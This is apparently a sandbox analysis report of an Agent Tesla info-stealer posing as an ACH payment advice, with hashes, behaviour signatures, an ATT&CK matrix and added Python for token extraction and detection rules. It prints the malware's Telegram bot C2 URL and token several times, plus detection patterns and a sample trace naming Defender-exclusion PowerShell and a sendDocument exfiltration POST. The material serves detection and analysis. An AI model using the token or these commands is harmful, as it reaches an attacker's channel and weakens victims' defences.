General

  • Target

    23052024_1347_22052024_Ach_Payment_Advice01.gz

  • Size

    612KB

  • Sample

    240523-q3yfksdb8y

  • MD5

    adf375448796e4d3f80067a25fe89f46

  • SHA1

    cfc575914ca0ebe94abf5d89722f6fbfaa9e1ee9

  • SHA256

    c992f916c0381e40b3849ad77534f0bb944e4e42283793fd7ac06e245cd43cef

  • SHA512

    e98fa14ef9a55f05bc8f48cab97397d732c12154b12caaef0d8fd0e39d8fff5b22f865eb9f9ade221ac64840011f2bbf2361042be9fbabe2c7f398dd976c3dc3

  • SSDEEP

    12288:RJCt63Yngjh38jpvNO1ShvoOJ/gf5jb0qy3QQ5tcGgU0fOYeWiKp6cgxA:G63cihMpFutYjtPEU0m3KIcH

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot7116470912:AAFcUeHH1656vYbBtccMjQVal4iMak99ZmA/
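The extracted C2 is a Telegram Bot API URL with the bot token embedded in the path, so anyone holding the token can read and post to the same channel. The following is an added example (not part of the sandbox report and not Agent Tesla's own code) of pulling such tokens out of a raw string dump. It assumes the usual token layout (numeric bot id, colon, a 30-40 character secret) and scans both ASCII and UTF-16LE strings, because .NET binaries store their string literals as UTF-16LE; the sample blob is constructed here.

```python
import re

# Telegram Bot API URL with an embedded bot token: "bot<id>:<secret>". The length bounds
# are an assumption based on the token format seen in practice (10-digit id, 35-char secret).
TELEGRAM_C2_RE = re.compile(
    rb"https?://api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{30,40})/?"
)


def defang(url: str) -> str:
    """Make an indicator safe to paste into a report (hxxps, [.])."""
    return url.replace("https://", "hxxps://").replace("http://", "hxxp://").replace(".", "[.]")


def find_telegram_c2(blob: bytes) -> list:
    """Return each distinct Telegram bot token found in blob, in ASCII or UTF-16LE strings."""
    views = [blob]
    # .NET (Agent Tesla) stores string literals as UTF-16LE; decode at both byte
    # alignments and keep only the ASCII so the same regex can run over the result.
    for offset in (0, 1):
        text = blob[offset:].decode("utf-16le", errors="ignore")
        views.append(text.encode("ascii", errors="ignore"))
    found = {}
    for data in views:
        for m in TELEGRAM_C2_RE.finditer(data):
            bot_id, secret = m.group(1).decode(), m.group(2).decode()
            token = f"{bot_id}:{secret}"
            # setdefault: the same token seen in several encodings is reported once
            found.setdefault(token, {
                "bot_id": bot_id,
                "token": token,
                "defanged_url": defang(m.group(0).decode()),
            })
    return list(found.values())


# Constructed sample blob: a decoy without a token, an ASCII copy of the report's C2 URL,
# an odd padding byte, then a UTF-16LE copy that therefore starts at an odd offset.
SAMPLE_BLOB = (
    b"\x00\x10https://api.telegram.org/\x00"
    + b"https://api.telegram.org/bot7116470912:AAFcUeHH1656vYbBtccMjQVal4iMak99ZmA/sendDocument\x00"
    + b"\xcc"
    + "https://api.telegram.org/bot7116470912:AAFcUeHH1656vYbBtccMjQVal4iMak99ZmA/".encode("utf-16le")
    + "getMe".encode("utf-16le")
)

if __name__ == "__main__":
    for hit in find_telegram_c2(SAMPLE_BLOB):
        print(hit["bot_id"], hit["defanged_url"])
```

Scanning at both byte alignments matters: the UTF-16LE copy in the sample sits at an odd offset, so a single `decode("utf-16le")` over the whole file would miss it. Never paste the token into a browser or send it to `/getMe` from an analyst workstation; treat it as a credential and report it to Telegram for revocation.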

Targets

    • Target

      Ach_Payment_Advice01.exe

    • Size

      689KB

    • MD5

      eeb0a5f2f2e765bbe937e595ddd0650a

    • SHA1

      2a5127e5fdf921547b4ec39e964682469573e1f6

    • SHA256

      2869686380724afd713bbefc58c9aceabd90692e27d9de7af96e748b3066d8e9

    • SHA512

      46f36ddb5d6dc37ac4d1d0388c87971933e8f8fae7de89d54483b5a900365c786b859b9b7fbd7f721a03ac03025ce800f5ee3ebcb67aa22442d8df1853456ee8

    • SSDEEP

      12288:c5h2Xp96Wtlc5ingN/JuXdH7O18x3UObHgf5jFuq4XQM5taSw40fgYYMiwp68kxU:c5UXfvtlc5yC/adbChYjl9c40oRwI81

    • AgentTesla

      Agent Tesla is a .NET-based remote access tool (RAT) and information stealer, originally written in Visual Basic.

    • UAC bypass

    • Windows security bypass

    • Looks for VirtualBox Guest Additions in registry

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.

    • Looks for VMWare Tools registry key

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up the country code configured in the registry, likely for geofencing.

    • Windows security modification

    • Checks whether UAC is enabled

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext
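The behaviours listed above (Defender exclusions via PowerShell, VirtualBox/VMware/BIOS checks, country-code and drive enumeration, the UAC check, the external IP lookup, the Telegram C2 and SetThreadContext) are the kind of signature a sandbox or EDR pipeline keys on. The following is an added example, not the report's or any sandbox's own code, of such rules run over a constructed JSON-lines process trace. The registry paths the rules match are the keys these signatures conventionally check and are an assumption here (the report names only the behaviours); the technique IDs T1016.001, T1102 and T1055 used for the network and API events are not in the report's matrix and are added for completeness.

```python
import json
import re
from collections import defaultdict

# Each rule: (signature, ATT&CK technique, event kind, pattern over the event's "target").
# Registry paths are assumed (conventional keys for these checks), not taken from the report.
RULES = [
    ("PowerShell adds Windows Defender exclusions", "T1562.001", "process",
     re.compile(r"powershell.*Add-MpPreference\s+-Exclusion(Path|Extension|Process)", re.I | re.S)),
    ("Defender exclusion written directly to the registry", "T1562.001", "registry_set",
     re.compile(r"\\Windows Defender\\Exclusions\\", re.I)),
    ("Looks for VirtualBox Guest Additions", "T1497", "registry_query",
     re.compile(r"\\Oracle\\VirtualBox Guest Additions", re.I)),
    ("Looks for VMware Tools", "T1497", "registry_query",
     re.compile(r"\\VMware, Inc\.\\VMware Tools", re.I)),
    ("Reads BIOS information", "T1082", "registry_query",
     re.compile(r"\\HARDWARE\\DESCRIPTION\\System\\BIOS", re.I)),
    ("Reads configured country code (geofence)", "T1082", "registry_query",
     re.compile(r"\\Control Panel\\International\\Geo\\Nation", re.I)),
    ("Enumerates connected drives", "T1120", "registry_query",
     re.compile(r"\\Services\\Disk\\Enum", re.I)),
    ("Checks whether UAC is enabled", "T1548.002", "registry_query",
     re.compile(r"\\Policies\\System\\EnableLUA", re.I)),
    ("External IP lookup via web service", "T1016.001", "network",
     re.compile(r"\b(api\.ipify\.org|checkip\.dyndns\.org|icanhazip\.com|ip-api\.com)\b", re.I)),
    ("Telegram Bot API used as C2", "T1102", "network",
     re.compile(r"api\.telegram\.org/bot\d+:[\w-]+", re.I)),
    ("SetThreadContext (process hollowing indicator)", "T1055", "api",
     re.compile(r"^SetThreadContext$")),
]


def analyze(event_lines):
    """Run RULES over a JSON-lines trace; each event is {"kind", "process", "target"}."""
    matches = []
    by_technique = defaultdict(set)
    for raw in event_lines:
        raw = raw.strip()
        if not raw:
            continue
        ev = json.loads(raw)
        for signature, technique, kind, pattern in RULES:
            if ev.get("kind") == kind and pattern.search(ev.get("target", "")):
                matches.append({"process": ev.get("process"), "technique": technique,
                                "signature": signature, "target": ev["target"]})
                by_technique[technique].add(signature)
    techniques = {t: sorted(s) for t, s in by_technique.items()}
    # Verdict: tampering with Defender plus a live C2 channel is conclusive; VM and
    # system checks alone are also done by legitimate software, so only "suspicious".
    if "T1562.001" in techniques and "T1102" in techniques:
        verdict = "malicious"
    elif techniques:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "techniques": techniques, "matches": matches}


# Constructed sample trace modelled on the behaviours in the report; not real sandbox output.
SAMPLE_TRACE = r"""
{"kind": "process", "process": "Ach_Payment_Advice01.exe", "target": "powershell.exe -NoProfile -Command Add-MpPreference -ExclusionPath C:\\Users\\Public"}
{"kind": "registry_query", "process": "Ach_Payment_Advice01.exe", "target": "HKLM\\SOFTWARE\\Oracle\\VirtualBox Guest Additions"}
{"kind": "registry_query", "process": "Ach_Payment_Advice01.exe", "target": "HKLM\\SOFTWARE\\VMware, Inc.\\VMware Tools"}
{"kind": "registry_query", "process": "Ach_Payment_Advice01.exe", "target": "HKLM\\HARDWARE\\DESCRIPTION\\System\\BIOS"}
{"kind": "registry_query", "process": "Ach_Payment_Advice01.exe", "target": "HKCU\\Control Panel\\International\\Geo\\Nation"}
{"kind": "registry_query", "process": "Ach_Payment_Advice01.exe", "target": "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"}
{"kind": "registry_query", "process": "Ach_Payment_Advice01.exe", "target": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA"}
{"kind": "api", "process": "Ach_Payment_Advice01.exe", "target": "SetThreadContext"}
{"kind": "network", "process": "Ach_Payment_Advice01.exe", "target": "GET http://api.ipify.org/"}
{"kind": "network", "process": "Ach_Payment_Advice01.exe", "target": "POST https://api.telegram.org/bot7116470912:AAFcUeHH1656vYbBtccMjQVal4iMak99ZmA/sendDocument"}
{"kind": "registry_query", "process": "explorer.exe", "target": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"}
"""

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_TRACE.splitlines()), indent=2))
```

The split into kinds (process, registry_query, registry_set, network, api) mirrors how sandbox signatures are scoped; in a Sysmon-only environment note that registry reads are not logged (only Event ID 12/13/14 create, set and rename), so the VM and BIOS checks would have to come from an API-tracing source rather than Sysmon.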

MITRE ATT&CK Matrix (ATT&CK v13)

  Tactic                Technique                              Count  ID
  Execution             Command and Scripting Interpreter      1      T1059
                          PowerShell                           1      T1059.001
  Privilege Escalation  Abuse Elevation Control Mechanism      1      T1548
                          Bypass User Account Control          1      T1548.002
  Defense Evasion       Abuse Elevation Control Mechanism      1      T1548
                          Bypass User Account Control          1      T1548.002
  Defense Evasion       Impair Defenses                        3      T1562
                          Disable or Modify Tools              3      T1562.001
  Defense Evasion       Modify Registry                        4      T1112
  Defense Evasion       Virtualization/Sandbox Evasion         2      T1497
  Discovery             Query Registry                         5      T1012
  Discovery             Virtualization/Sandbox Evasion         2      T1497
  Discovery             System Information Discovery           5      T1082
  Discovery             Peripheral Device Discovery            1      T1120

  Count is the number of matched signatures attributed to each technique.
